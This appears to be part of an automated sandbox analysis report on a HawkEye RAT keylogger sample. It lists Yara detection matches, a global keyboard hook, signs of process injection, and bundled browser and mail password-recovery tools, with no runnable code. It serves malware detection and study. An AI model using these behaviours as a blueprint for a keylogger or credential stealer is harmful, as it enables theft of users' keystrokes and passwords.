Source: Yara match	File source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pictures.exe PID: 6240, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED
Source: Yara match	File source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: Pictures.exe.8.dr, Form1.cs	.Net Code: HookKeyboard
Source: 10.0.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: HookKeyboard
Source: 10.2.Pictures.exe.150000.0.unpack, Form1.cs	.Net Code: HookKeyboard

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Pictures.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\PO456724392021.exe
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\PO2345714382021.exe

Source: LOGO AND PICTURES.exe, 00000009.00000002.608636145.000000000151B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large array initializations

Show sources

Source: 16.0.PO2345714382021.exe.5d0000.0.unpack, u003cPrivateImplementationDetailsu003eu007b8E6E7EF7u002dAC19u002d4F3Fu002d8489u002d4F7AD84D7DAFu007d/E4F05C4Eu002d2007u002d4C5Fu002dB313u002d78ABE577C964.cs

Large array initialization: .cctor: array initializer size 11976

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A254E6 NtResumeThread,	10_2_04A254E6
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A2543E NtQuerySystemInformation,	10_2_04A2543E
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A2558E NtWriteVirtualMemory,	10_2_04A2558E
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A253FA NtQuerySystemInformation,	10_2_04A253FA
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_04A25561 NtWriteVirtualMemory,	10_2_04A25561

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_01C5C4CC	0_2_01C5C4CC
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_01C5E463	0_2_01C5E463
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Code function: 0_2_01C5E470	0_2_01C5E470
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_01359754	9_2_01359754
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0135A3B8	9_2_0135A3B8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0135A3A9	9_2_0135A3A9
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0135A380	9_2_0135A380
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030CF22A	9_2_030CF22A
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030CD1D8	9_2_030CD1D8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030C0580	9_2_030C0580
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030CDAA8	9_2_030CDAA8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030CCE90	9_2_030CCE90
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030C10F8	9_2_030C10F8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030C1618	9_2_030C1618
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030C0BE0	9_2_030C0BE0
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_030C8A38	9_2_030C8A38
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032183A0	9_2_032183A0
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032141E8	9_2_032141E8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321E020	9_2_0321E020
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321F7D8	9_2_0321F7D8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032166E0	9_2_032166E0
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_03217A98	9_2_03217A98
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321E808	9_2_0321E808
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032178A8	9_2_032178A8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321EFF0	9_2_0321EFF0
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_03211C30	9_2_03211C30
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_03218390	9_2_03218390
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032141D8	9_2_032141D8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321E011	9_2_0321E011
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321E01E	9_2_0321E01E
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321F778	9_2_0321F778
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321E7A7	9_2_0321E7A7
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032166D0	9_2_032166D0
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_032166DE	9_2_032166DE
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_03215F38	9_2_03215F38
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_0321EFE9	9_2_0321EFE9
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Code function: 9_2_00DB73C0	9_2_00DB73C0
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0015D426	10_2_0015D426
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0015D523	10_2_0015D523
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0016D5AE	10_2_0016D5AE
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00167646	10_2_00167646
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001929BE	10_2_001929BE
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00196AF4	10_2_00196AF4
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001BABFC	10_2_001BABFC
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001B3C4D	10_2_001B3C4D
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001B3CBE	10_2_001B3CBE
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0015ED03	10_2_0015ED03
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001B3D2F	10_2_001B3D2F
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_001B3DC0	10_2_001B3DC0
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0015CF92	10_2_0015CF92
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0016AFA6	10_2_0016AFA6
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C96048	10_2_00C96048
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C95758	10_2_00C95758
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C98710	10_2_00C98710
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C91DA8	10_2_00C91DA8
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C97088	10_2_00C97088
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_00C97098	10_2_00C97098
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 10_2_0018C7BC	10_2_0018C7BC

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe

Code function: String function: 0019BA9D appears 35 times

Source: unknown

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2184

Source: Pictures.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Pictures.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Pictures.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.314008888.0000000008070000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.315076330.0000000008220000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameVNXT.exe* vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameqSFGwNyTRHxXnFNQmReMEDLopGXKYkP.exed" vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameBehbBNmlFodyWDcOLIcGKBGvXeAtKtoPsNVNJ.exe4 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaVGHPRrbHbSzmBgNIxPPIWutzHpjQGUX.exe4 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameViottoBinder_Stub.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.314382538.00000000080D0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.314382538.00000000080D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaVGHPRrbHbSzmBgNIxPPIWutzHpjQGUX.exe4 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000002.300376997.0000000003850000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameVNXT.exe* vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameqSFGwNyTRHxXnFNQmReMEDLopGXKYkP.exed" vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameBehbBNmlFodyWDcOLIcGKBGvXeAtKtoPsNVNJ.exe4 vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000002.300352400.0000000003720000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000002.300352400.0000000003720000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs B6LNCKjOGt5EmFQ.exe
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameViottoBinder_Stub.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX vs B6LNCKjOGt5EmFQ.exe

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Section loaded: security.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Section loaded: security.dll

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
